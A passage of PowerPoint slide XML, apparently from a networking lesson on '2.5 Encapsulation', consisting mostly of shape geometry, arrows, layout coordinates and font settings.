        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4963516" y="3170608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39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AD10AAA-D2EE-99F2-803E-4A02A3F25F1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5554320" y="2925878"/>
            <a:ext cx="2496820" cy="772795"/>
            <a:chOff x="5532882" y="2995421"/>
            <a:chExt cx="2496820" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="object 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A62F50C-18A3-9142-D1A6-2DF22F343332}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5532882" y="2995421"/>
              <a:ext cx="2496820" cy="772795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2496820" h="772795">
                  <a:moveTo>
                    <a:pt x="2367534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2367534" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417659" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2458592" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2486191" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2496312" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2496312" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2486191" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2458592" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417659" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367534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9" name="object 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4564A87F-E51A-B691-84CF-459E16D8B98A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5532882" y="2995421"/>
              <a:ext cx="2496820" cy="772795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2496820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2367534" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417659" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2458592" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2486191" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2496312" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2496312" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2486191" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2458592" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417659" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367534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4" name="object 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0712A91F-8276-2F91-2213-5B27B2AA315F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5720435" y="3170608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43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62864680-5ED7-C954-AA00-23BA045F3FB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4033367" y="3828086"/>
            <a:ext cx="864235" cy="774700"/>
            <a:chOff x="4011929" y="3897629"/>
            <a:chExt cx="864235" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="object 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E5365AA-CA8E-2CC9-F124-25D5E6291F0F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4011929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0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="10140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730D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7" name="object 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{018202EB-9917-98A5-286E-4547215D23FA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4011929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0" y="129032"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10142" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="10140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0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1290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6" name="object 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90C50E37-D73E-57CF-452F-616E8B0AB34C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4171416" y="4073704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7" name="object 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE253ABB-04DB-8A6B-608C-6D60BDF3B969}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4761839" y="3828087"/>
            <a:ext cx="3289300" cy="774700"/>
            <a:chOff x="4740401" y="3897630"/>
            <a:chExt cx="3289300" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="object 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C295900-D58B-B2E8-BD11-D69C24BD8829}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4740401" y="3897630"/>
              <a:ext cx="3289300" cy="774700"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3289300" h="774700">
                  <a:moveTo>
                    <a:pt x="3159759" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="129032" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="10140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3159759" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3209978" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3250993" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3278649" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3288792" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3288792" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3278649" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3250993" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3209978" y="10140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3159759" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="730D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5" name="object 49">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB5D4A47-149C-5A2D-C4C7-FE6D79763B59}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4740401" y="3897630"/>
              <a:ext cx="3289300" cy="774700"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3289300" h="774700">
                  <a:moveTo>
                    <a:pt x="0" y="129032"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10142" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="10140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3159759" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3209978" y="10140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3250993" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3278649" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3288792" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3288792" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3278649" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3250993" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3209978" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3159759" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1290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8" name="object 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD5B2063-F57D-A9A0-7DD8-6F8E0210E3CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4941291" y="4073704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51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9DB5DF3-6D29-0FBF-8C10-84A1B51124E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3225647" y="1286055"/>
            <a:ext cx="576580" cy="3278504"/>
            <a:chOff x="3204209" y="1355598"/>
            <a:chExt cx="576580" cy="3278504"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="object 52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F26F23FE-60C5-B642-B366-EAE7D4D02513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432053" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144017" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144017" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288036" y="3278124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2990088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3" name="object 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5455EFA-4864-2977-70B0-FD7026DFAED1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0" y="2990088"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144017" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144017" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288036" y="3278124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2990088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0" name="object 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AAB4B58-0514-8496-CE65-52B18403CF2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3449803" y="1364617"/>
            <a:ext cx="85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55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2B0D9FF-8158-57AE-5744-0D5E1E9ADF4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3440659" y="1609142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56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{638DA559-2F7F-FC6F-9F94-A9D6B542DAF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3440659" y="1852982"/>
            <a:ext cx="1454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" indent="-1905" algn="just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w e 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57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D6B5B06-6BDD-742E-4DF0-CCC28F74668C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429483" y="2828596"/>
            <a:ext cx="126364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  <a:p>
            <a:pPr marL="12700" marR="5080" indent="1270"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a y e r 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58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A483170A-4E76-869C-E2C3-EBF812F890DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8122260" y="1290627"/>
            <a:ext cx="576580" cy="3276600"/>
            <a:chOff x="8100822" y="1360170"/>
            <a:chExt cx="576580" cy="3276600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="object 59">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9BB872E-FB16-BF58-9E45-A10863773A98}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8100822" y="1360170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432053" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144018" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288035" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2988564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1" name="object 60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F04A85BF-261D-D4B6-5095-1DFA7CA86B49}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8100822" y="1360170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0" y="2988564"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144018" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288035" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2988564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5" name="object 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A1958C2-90BC-635A-2975-F268629BB85F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357082" y="1246685"/>
            <a:ext cx="10668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254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 c a p s u l a t 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64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{054F5264-7B73-CC80-2525-AA9A8F500D7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5131791" y="4766534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37" name="object 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8263A26D-A4E2-5BDC-D3C9-674ACFD5D363}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5131791" y="4777180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41</a:t>
            </a:fld>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="object 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9183C957-6F5D-A8BB-87E5-F7D65865A744}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357082" y="3929839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63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E529A29-A5AF-2067-3771-FC2D1ACC5E4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357082" y="4173679"/>
            <a:ext cx="106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81AB96-8087-0C11-F7C9-F39935FE8C63}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="461880" y="1195560"/>
              <a:ext cx="7691760" cy="34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81AB96-8087-0C11-F7C9-F39935FE8C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520" y="1186200"/>
                <a:ext cx="7710480" cy="34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56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BD33525-2E5B-3E3B-539A-7F2708791B23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432428" y="185345"/>
            <a:ext cx="33032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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>5 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2900" b="1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900" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Encapsulation</a:t>
            </a:r>
            <a:endParaRPr sz="2900" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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B7348A79-A8BF-82EB-0627-082BAACB1C10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561410" y="1097078"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="1166621"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="object 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F2FABAE-8D9D-FBC5-CEC2-0BFB624C4FDC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6" name="object 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CB87F4A-6B62-1AD0-3670-ED435A37B1DE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44AD4AFC-2098-58CA-FC42-BDCCC1B66768}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717416" y="1181102"/>
            <a:ext cx="20078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4ABD5155-F527-F495-DEAA-EE7CDD3A7469}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561410" y="2009955"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="2079498"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="object 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01F4F984-634F-A162-BB00-BBEB2F4530A6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00763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4" name="object 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7613D439-AF44-E707-866E-7C78DAE5E220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8" name="object 10">
            <a:extLst>
